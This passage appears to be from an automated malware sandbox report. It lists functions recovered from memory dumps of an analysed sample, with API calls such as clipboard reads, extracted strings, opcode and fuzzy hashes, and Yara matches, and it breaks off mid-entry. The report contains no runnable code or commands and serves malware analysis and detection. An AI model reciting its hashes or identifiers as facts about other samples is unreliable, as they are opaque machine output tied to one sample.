VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 023AEEC9

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction ID: 1870f67bfa3836af35d009cbd511cf5fd2850d4dbe7f2b58ccac18cceb11a9db
Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction Fuzzy Hash: 06B1E332500706AFDB36AF60CC90BABB7E9FF45304F100639EA5996950E732E551CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0290E6AB Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL ref: 0290E6C5

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a385ac3ee98f8e5260cafcf5a84f02f04c49f816fe60666f5ec07f7d23c73c96
Instruction ID: 5cc3bccca8f321144dff53daf12a622688f479cda6dfae484f0a1476f74c779a
Opcode Fuzzy Hash: a385ac3ee98f8e5260cafcf5a84f02f04c49f816fe60666f5ec07f7d23c73c96
Instruction Fuzzy Hash: A1317BB4A183408FD750EF38D584A2ABBF0BB89344F51892EE9D9C7350E731A959CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0291914C Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 029191B5

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1289f2f2d4a60254242fae2bec9233a5b2095c0f74d9e13262e93c917b6653de
Instruction ID: be54aa27b7f776a6e484a228d43b5cc882285e103dfe439103c91d5858685dcd
Opcode Fuzzy Hash: 1289f2f2d4a60254242fae2bec9233a5b2095c0f74d9e13262e93c917b6653de
Instruction Fuzzy Hash: 5C01DD70508341AFE710CF11D894B5BFBB2EBC5324F608E48E8A417685C371E95A8B86

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0290DDE0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 153clipboardCOMMON

Download Yara Rule

APIs

GetWindowInfo.USER32 ref: 0290DE34
OpenClipboard.USER32 ref: 0290DE46
GetClipboardData.USER32 ref: 0290DE6B
GlobalFix.KERNEL32 ref: 0290DE8C
GlobalUnWire.KERNEL32 ref: 0290DF8B
CloseClipboard.USER32 ref: 0290DF91

Strings

N, xrefs: 0290DEF5
K, xrefs: 0290DEF9
I, xrefs: 0290DEE9
7, xrefs: 0290DEE5
8, xrefs: 0290DEED
L, xrefs: 0290DEFD

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
String ID: 7$8$I$K$L$N
API String ID: 2111159801-2422513041
Opcode ID: 7e745ab1bcc0c661bd106f5f565e0615f515d2e639a54461137cb16088da39a9
Instruction ID: e92d55d010cb801c80a7178d79f341fec7c7a0f2a0e789c995ea2a533399ec7b
Opcode Fuzzy Hash: 7e745ab1bcc0c661bd106f5f565e0615f515d2e639a54461137cb16088da39a9
Instruction Fuzzy Hash: EB517BB4508740CFD721DF78C485616BFE0EF16324F048AA9E8DA8B796D335E805CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02380955 Relevance: 15.5, Strings: 12, Instructions: 473COMMON

Download Yara Rule

Strings

Ny0{, xrefs: 02381463
x!\', xrefs: 02380AA2
GC, xrefs: 02381369
[J, xrefs: 02381355
)/, xrefs: 02380D4A
.q#s, xrefs: 02381477
H{, xrefs: 0238135F
4i:k, xrefs: 0238148B
bD, xrefs: 0238134B
)m:o, xrefs: 02381495
"u w, xrefs: 02381481
8a)c, xrefs: 0238149F

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
API String ID: 0-3498391054
Opcode ID: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
Instruction ID: 112112aa80c6d3b0e302d04c317d78467d8a373db3a9882056b20c42c76b153d
Opcode Fuzzy Hash: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
Instruction Fuzzy Hash: C252FAB0205B858FE325CF25D494BD7BBE1BB06348F50891EC4EB5B646DB74A14ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 028FEF19 Relevance: 15.5, Strings: 12, Instructions: 473COMMON

Download Yara Rule

Strings

GC, xrefs: 028FF92D
bD, xrefs: 028FF90F
Ny0{, xrefs: 028FFA27
[J, xrefs: 028FF919
8a)c, xrefs: 028FFA63
4i:k, xrefs: 028FFA4F
x!\', xrefs: 028FF066
H{, xrefs: 028FF923
)/, xrefs: 028FF30E
)m:o, xrefs: 028FFA59
.q#s, xrefs: 028FFA3B
"u w, xrefs: 028FFA45

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
API String ID: 0-3498391054
Opcode ID: feabfad14c7b4ae4d8ed6a443f3e7b36b9648eb16b9842020a8b99e73f1b0d34
Instruction ID: f418f1e7b02ee1c47b8187626732052598fc5af2b9d02bb943be067c287e9c94
Opcode Fuzzy Hash: feabfad14c7b4ae4d8ed6a443f3e7b36b9648eb16b9842020a8b99e73f1b0d34
Instruction Fuzzy Hash: F8520CB4205B858FE325CF25D494BD7BBE1BB06348F40891EC5EB5B686CB74A149CF82

Uniqueness

Uniqueness Score: -1.00%

Function 02371209 Relevance: 13.8, Strings: 11, Instructions: 100COMMON

Download Yara Rule

Strings

3yZ{, xrefs: 0237129C
hI4K, xrefs: 02371270
Hik, xrefs: 023712C8
~w, xrefs: 02371433
u!|#, xrefs: 0237122E
9aBc, xrefs: 023712DE
u=w, xrefs: 023712BD
:m:o, xrefs: 023712D3
q$s, xrefs: 023712B2
8MnO, xrefs: 0237127B
M-q/, xrefs: 02371226

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: u=w$3yZ{$8MnO$9aBc$:m:o$Hik$M-q/$hI4K$u!|#$~w$q$s
API String ID: 0-1478902827
Opcode ID: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
Instruction ID: dce29e7699ed46c9e381d40f185cf4779cfbd58f5737d42142fa613f22ab220e
Opcode Fuzzy Hash: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
Instruction Fuzzy Hash: 7851CAB45193C19BE678CF11D8A1B9FBBA1BBC6344F608E1CD5D92B254CB30904ACF96

Uniqueness

Uniqueness Score: -1.00%

Function 028EF7CD Relevance: 13.8, Strings: 11, Instructions: 100COMMON

Download Yara Rule

Strings

8MnO, xrefs: 028EF83F
~w, xrefs: 028EF9F7
9aBc, xrefs: 028EF8A2
q$s, xrefs: 028EF876
M-q/, xrefs: 028EF7EA
:m:o, xrefs: 028EF897
Hik, xrefs: 028EF88C
hI4K, xrefs: 028EF834
u!|#, xrefs: 028EF7F2
u=w, xrefs: 028EF881
3yZ{, xrefs: 028EF860

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: u=w$3yZ{$8MnO$9aBc$:m:o$Hik$M-q/$hI4K$u!|#$~w$q$s
API String ID: 0-1478902827
Opcode ID: 5572e1d6ec30de06a81628df5ce3b1473ba3dd51980d05aff733c05b28603f59
Instruction ID: 44ab7ba09dad686310cc0bf9e6c81885f48167981a575983266a5f47e436d76f
Opcode Fuzzy Hash: 5572e1d6ec30de06a81628df5ce3b1473ba3dd51980d05aff733c05b28603f59
Instruction Fuzzy Hash: D351CAB45593C19BE678CF11D4A1B9FBBA1BBD6344F608E0CD5D92B254CB308046CF96

Uniqueness

Uniqueness Score: -1.00%

Function 02385C7C Relevance: 7.7, Strings: 6, Instructions: 223COMMON

Download Yara Rule

Strings

&>95, xrefs: 02385D67
4f, xrefs: 02385E1B
)5>Q, xrefs: 02385CA7
##*8, xrefs: 02385D53
rr}t, xrefs: 02385E4D
7&"4, xrefs: 02385D5D

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ##*8$&>95$)5>Q$7&"4$rr}t$4f
API String ID: 0-1817249549
Opcode ID: 6cc54dea0f3e3a957238fb8843838014d14fc5ef7f96927021fe5273e1921ce4
Instruction ID: 6b768f5ed13d7e405193ead0b1a9973f3174c3d6a1bc57653fed488e2d8acbfd
Opcode Fuzzy Hash: 6cc54dea0f3e3a957238fb8843838014d14fc5ef7f96927021fe5273e1921ce4
Instruction Fuzzy Hash: BC9145B4149B81CBE3268F25C8A0BE7BBE1FF56309F54095CC4EB0B285C376A4058F95

Uniqueness

Uniqueness Score: -1.00%

Function 02904240 Relevance: 7.7, Strings: 6, Instructions: 223COMMON

Download Yara Rule

Strings

4f, xrefs: 029043DF
)5>Q, xrefs: 0290426B
&>95, xrefs: 0290432B
##*8, xrefs: 02904317
7&"4, xrefs: 02904321
rr}t, xrefs: 02904411

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: AllocateHeap
String ID: ##*8$&>95$)5>Q$7&"4$rr}t$4f
API String ID: 1279760036-1817249549
Opcode ID: 0dc8c3e3afea9e425fab8841d49596fca757bd7e8c9f106349c7674ac81b335e
Instruction ID: 50999cc01daba8ba76a590b4fdd47dc8745db9eca54a413a2c101b8f55226d14
Opcode Fuzzy Hash: 0dc8c3e3afea9e425fab8841d49596fca757bd7e8c9f106349c7674ac81b335e
Instruction Fuzzy Hash: 729146B4149B80CAE7268F29D5A0BE7BBE1BF46309F541A4CC4EB0B285C376B4058F91

Uniqueness

Uniqueness Score: -1.00%

Function 0236B75C Relevance: 6.7, Strings: 5, Instructions: 468COMMON

Download Yara Rule

Strings

b, xrefs: 0236BBA2
j, xrefs: 0236BA68
0, xrefs: 0236B7D2
Y!N#, xrefs: 0236BC28
tQpS, xrefs: 0236BC48

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$Y!N#$b$j$tQpS
API String ID: 0-1561506603
Opcode ID: 45c243cf0ca8e2274e85070ecb056509f0a7305c0b5d6953bfe836e1f2057ffa
Instruction ID: d849afc1de75567cd8ecbc7cd341b34e2633d8d80b72f7f8cdc2e8999bbc6dde
Opcode Fuzzy Hash: 45c243cf0ca8e2274e85070ecb056509f0a7305c0b5d6953bfe836e1f2057ffa
Instruction Fuzzy Hash: A21223B02183819BE324CF15C4A4B6FBBE6BBC6308F449D1DE4D58B281C779D8098F96

Uniqueness

Uniqueness Score: -1.00%

Function 0236667C Relevance: 5.5, Strings: 4, Instructions: 498COMMON

Download Yara Rule

Strings

), xrefs: 02366718
IEND, xrefs: 02366BCF
IHDR, xrefs: 02366AE2
IDAT, xrefs: 02366B51

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: )$IDAT$IEND$IHDR
API String ID: 0-3181356877
Opcode ID: 8a7d19e3304fb962131ac192d74715622dc9e54721aa8770317e2bbf55eb4353
Instruction ID: 1d88e8afd376b0a1c959210fcb61c33bda01e4744ea7fd945169f41d9b6717e2
Opcode Fuzzy Hash: 8a7d19e3304fb962131ac192d74715622dc9e54721aa8770317e2bbf55eb4353
Instruction Fuzzy Hash: DA1246B16083408FD718CF28CC9572ABBE9EF85300F0585ADE9859B396D379D909CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0239CEAC Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

R-,T, xrefs: 0239CF5C
R-,T, xrefs: 0239D05C
gxyz, xrefs: 0239CF14

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: R-,T$R-,T$gxyz
API String ID: 0-1473045628
Opcode ID: 8485a954022714466d637d1ec12eb6bb83b8405d43bd8df9d8595431355dead1
Instruction ID: 2332895d660265c7ade44cf094d7acb235cc5475b934e77119ac0e23ad603c9d
Opcode Fuzzy Hash: 8485a954022714466d637d1ec12eb6bb83b8405d43bd8df9d8595431355dead1
Instruction Fuzzy Hash: FEA1C0726043129BCB15CF18C89176BB7E2FF89314F298A1CE8969B391D731E815CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0291B470 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0291B4D8
R-,T, xrefs: 0291B620
R-,T, xrefs: 0291B520

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: R-,T$R-,T$gxyz
API String ID: 0-1473045628
Opcode ID: 2c389e4ee98a11e8321b69df70e914701a72e8d296588be79f5ddf61436bfeac
Instruction ID: a115978337ef8344434bab7f39f2a4dd2c38b718284dea1c646c2ab93a2d6734
Opcode Fuzzy Hash: 2c389e4ee98a11e8321b69df70e914701a72e8d296588be79f5ddf61436bfeac
Instruction Fuzzy Hash: 26A1C0726043168BD715CF19C4A076BB7E6FFD8368F698A1CE8959B390D730E815CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02386BBF Relevance: 3.6, Strings: 2, Instructions: 1113COMMON

Download Yara Rule

Strings

cfbe, xrefs: 0238773A
= 'Q, xrefs: 0238792E

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: = 'Q$cfbe
API String ID: 0-911374196
Opcode ID: c7ed6d1a98b6f5c28f2481b07727322aa0001425e910c350d4d0536391605174
Instruction ID: d1a7e4ef412def78893cd7eb4625dbc4e942cd07795bca0818305af54413becb
Opcode Fuzzy Hash: c7ed6d1a98b6f5c28f2481b07727322aa0001425e910c350d4d0536391605174
Instruction Fuzzy Hash: 04923B74245B808EE726CB34C494BE3BBE1BF17348F54099CD4EB9B282C77AA506CB55

Uniqueness

Uniqueness Score: -1.00%

Function 023672CC Relevance: 3.4, Strings: 2, Instructions: 859COMMON

Download Yara Rule

Strings

8, xrefs: 02367C95
0, xrefs: 02367C9D

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 05554e331a898ce3e5d2d28d30dc6842799560a7bfe6e8c337d7132d452b72d2
Instruction ID: 732b2e2054fb9cbb768fc1fb09024f2b5dd7aa5620250502724a981165ab64eb
Opcode Fuzzy Hash: 05554e331a898ce3e5d2d28d30dc6842799560a7bfe6e8c337d7132d452b72d2
Instruction Fuzzy Hash: B1726B716083409FD724CF18C888BAABBE5FF88318F84891DF9999B395D375D944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 028E5890 Relevance: 3.4, Strings: 2, Instructions: 859COMMON

Download Yara Rule

Strings

8, xrefs: 028E6259
0, xrefs: 028E6261

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 9b5963a33a67b4d66f9ccea3749c8586647e0c0123af7c5cf110c0cfedcee3f4
Instruction ID: 189732cd54f38317b4f318b3b58acec0441c42a05337f2a9cc3b79d927dbbe76
Opcode Fuzzy Hash: 9b5963a33a67b4d66f9ccea3749c8586647e0c0123af7c5cf110c0cfedcee3f4
Instruction Fuzzy Hash: 71728E796083409FDB24CF18C480BABBBE1BF99318F44891DF99A8B391D775D944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 023888A3 Relevance: 3.3, Strings: 2, Instructions: 794COMMON

Download Yara Rule

Strings

cDEG, xrefs: 0238936C
OKGV, xrefs: 02388D01

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: OKGV$cDEG
API String ID: 0-3344514456
Opcode ID: 5c4e20b1cb1002911b0e13d38f56e643dc60e23d1d023b114e9d07b977b17b11
Instruction ID: f3eb2959efc97b09a0a46397d051b952e248ca48ce2bce853ae80e2b554a6e5d
Opcode Fuzzy Hash: 5c4e20b1cb1002911b0e13d38f56e643dc60e23d1d023b114e9d07b977b17b11
Instruction Fuzzy Hash: 4652BC70205B458FE739CF29C4907A3BBE2BF96308F588A5DC4E68BB85C375A409CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02906E67 Relevance: 3.3, Strings: 2, Instructions: 794COMMON

Download Yara Rule

Strings

cDEG, xrefs: 02907930
OKGV, xrefs: 029072C5

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: OKGV$cDEG
API String ID: 0-3344514456
Opcode ID: 94a3ef1b6b23e4c836477ad9c463556b2059054d038826ad2469765111e9c0b1
Instruction ID: 672628fc597322046e9d3b15c03d53a0b351477715fe1e4d20f0be77ca41d74c
Opcode Fuzzy Hash: 94a3ef1b6b23e4c836477ad9c463556b2059054d038826ad2469765111e9c0b1
Instruction Fuzzy Hash: 115277B0205B458FE325CF29C490BA7FBE2BF46318F588A5DD4EA8B685D375B009CB51

Uniqueness

Uniqueness Score: -1.00%

Function 023839BC Relevance: 2.9, Strings: 2, Instructions: 369COMMON

Download Yara Rule

Strings

vSUN, xrefs: 02383DF6
A\]D, xrefs: 02383D92

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: A\]D$vSUN
API String ID: 0-3118794373
Opcode ID: 03feea6e1d589d380401754c7725727d6d3627a4905a7b22f6b6df05ed48b411
Instruction ID: 04a5df58d55d4d8e4edbb73aff232dc16609ba4bbc442831d1ca46ebc0ee4c2b
Opcode Fuzzy Hash: 03feea6e1d589d380401754c7725727d6d3627a4905a7b22f6b6df05ed48b411
Instruction Fuzzy Hash: ADC1CEB1A083419FD710EF28C89072BB7E1EF85B54F14896DE4C58B341E774E949CB86

Uniqueness

Uniqueness Score: -1.00%

Function 023788A5 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

/9++, xrefs: 02378B23
756., xrefs: 02378B1C

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: /9++$756.
API String ID: 0-2948954884
Opcode ID: 7ee79a046eb4157686be4d9f50bcc8fda8102fc623c5d9beae8a7122bfe23570
Instruction ID: 9951c09f0b2b818153149a8265d3efe80d749c9d0c3cbb817e680251622c3f5b
Opcode Fuzzy Hash: 7ee79a046eb4157686be4d9f50bcc8fda8102fc623c5d9beae8a7122bfe23570
Instruction Fuzzy Hash: 5AB1AD70504B418BD739CF24C4A9363BBE2BF96354F188A4DC0EB4BB92C739A446DB95

Uniqueness

Uniqueness Score: -1.00%

Function 028F6E69 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

756., xrefs: 028F70E0
/9++, xrefs: 028F70E7

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: /9++$756.
API String ID: 0-2948954884
Opcode ID: 0fa81f6eaa62c412abad391dc2f89779b3aae0bc1b7ebf033bd42fe2f9d90fba
Instruction ID: 7df4706f2f2ea5be6387381819184cdcba714131eaa05139382fd82261430f64
Opcode Fuzzy Hash: 0fa81f6eaa62c412abad391dc2f89779b3aae0bc1b7ebf033bd42fe2f9d90fba
Instruction Fuzzy Hash: AEB1AE79504B418BE369CF24C0A1363BBE2FF86318F148A1DC1EB8BB91D735A446CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02382CEC Relevance: 2.8, Strings: 2, Instructions: 263COMMON

Download Yara Rule

Strings

EBC, xrefs: 02382D75
s}, xrefs: 02382FBC

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: s}$EBC
API String ID: 0-541026534
Opcode ID: 6ddf01aa1ffdadc8da86c39f90ddd0bfc30155f55a5fbfb5c877fdaf387ca4af
Instruction ID: 4d2cfd85a942838968772facc7aa4f32731b2a217504626b05c3fb6d77c98dda
Opcode Fuzzy Hash: 6ddf01aa1ffdadc8da86c39f90ddd0bfc30155f55a5fbfb5c877fdaf387ca4af
Instruction Fuzzy Hash: B19175B15083818BD724DF14C89076BBBF1FF81758F148A1CE8A69B391E379D909CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02399F12 Relevance: 2.6, Strings: 2, Instructions: 138COMMON

Download Yara Rule

Strings

D1B7, xrefs: 02399F77
D1B7, xrefs: 02399E4E

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: D1B7$D1B7
API String ID: 0-2576811906
Opcode ID: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
Instruction ID: 0a6a309360a99307bce834c32b1b5003edcd2aa83db27d7ef5b6ed70e8b048c0
Opcode Fuzzy Hash: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
Instruction Fuzzy Hash: CF5168B4618301EBDB08DF10E9A072BBBE2BB86709F04992CE48547351E7758905EB8A

Uniqueness

Uniqueness Score: -1.00%

Function 02397EBC Relevance: 1.9, Strings: 1, Instructions: 632COMMON

Download Yara Rule

Strings

&QPS, xrefs: 02398474

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: &QPS
API String ID: 0-2176464483
Opcode ID: 46f4230af82bee1de83ac0e6d75915a69e2b879e8969acc8d095cf8940907a8d
Instruction ID: 719b49a20d3eac7d0c868a3a70a181e2769e3a953302bb4ad1ad9028e5263013
Opcode Fuzzy Hash: 46f4230af82bee1de83ac0e6d75915a69e2b879e8969acc8d095cf8940907a8d
Instruction Fuzzy Hash: 14327C716183419FDB14CF18C890B2BBBE6BBCA318F188A2CE5959B391D735E805CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02916480 Relevance: 1.9, Strings: 1, Instructions: 632COMMON

Download Yara Rule

Strings

&QPS, xrefs: 02916A38

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: &QPS
API String ID: 0-2176464483
Opcode ID: d94ddcc129e7ddfdd4c43e3afcdad68cce679b011833c60d4693591da756f2a7
Instruction ID: 28e9052e9f46e6f113855de1eac13fc54349d31a25a03f05cb380d711711746e
Opcode Fuzzy Hash: d94ddcc129e7ddfdd4c43e3afcdad68cce679b011833c60d4693591da756f2a7
Instruction Fuzzy Hash: B3328970A083459FD714CF19C590B2BBBEABBC9308F588A1CE9D59B391D735E805CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02377593 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

v, xrefs: 02377B15

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: 065b0362184322e70347aa1468ee54d6b454311281bc63e7ad54eb8d13dc1da2
Instruction ID: 83cd7cc179f092b1caebe48cc795fa8aa51466319184e7e040b25e8042558489
Opcode Fuzzy Hash: 065b0362184322e70347aa1468ee54d6b454311281bc63e7ad54eb8d13dc1da2
Instruction Fuzzy Hash: 02E19DB15183419FD724CF14C481B6BFBE2ABDA304F148A6DE4D98B392D739D849CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02388965 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

OKGV, xrefs: 02388D01

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: OKGV
API String ID: 0-2748110933
Opcode ID: 68b20ac99494e757251efaa59fb5d3cfc99ae37d895fe641597ca6f6139cc955
Instruction ID: 1d0d0ede16e00a51a79e649dae4c85e20b5a68658b34eed81938462f407703f7
Opcode Fuzzy Hash: 68b20ac99494e757251efaa59fb5d3cfc99ae37d895fe641597ca6f6139cc955
Instruction Fuzzy Hash: 35F18CB0205B458FE339CF25C0907A7BBE2BF96304F988A6DC4EA4B785C735A009CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02906F29 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

OKGV, xrefs: 029072C5

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID: OKGV
API String ID: 0-2748110933
Opcode ID: fe7105b3e4a296fcb14fa37f046aef5bcbe5a5ee45b8821250d1971024326347
Instruction ID: 25b07bea4c97d179fcfc84fdfdac6e29196d6488bf27fd06b65463f78ee8003f
